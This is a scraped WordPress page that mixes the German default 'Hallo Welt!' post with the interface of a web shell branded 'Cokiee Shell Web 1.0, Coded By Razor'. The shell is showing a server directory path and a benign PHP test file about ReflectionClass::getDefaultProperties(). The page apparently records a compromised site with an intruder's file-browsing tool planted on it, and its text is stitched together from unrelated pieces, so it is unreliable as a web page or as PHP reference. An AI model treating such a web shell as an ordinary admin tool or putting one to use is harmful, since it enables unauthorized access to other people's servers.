Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/reflection/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/reflection/tests/bug41884.phpt |
--TEST-- Bug #41884 (ReflectionClass::getDefaultProperties() does not handle static attributes) --FILE-- <?php class Foo { protected static $fooStatic = 'foo'; protected $foo = 'foo'; } $class = new ReflectionClass('Foo'); var_dump($class->getDefaultProperties()); echo "Done\n"; ?> --EXPECTF-- array(2) { ["fooStatic"]=> string(3) "foo" ["foo"]=> string(3) "foo" } Done
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare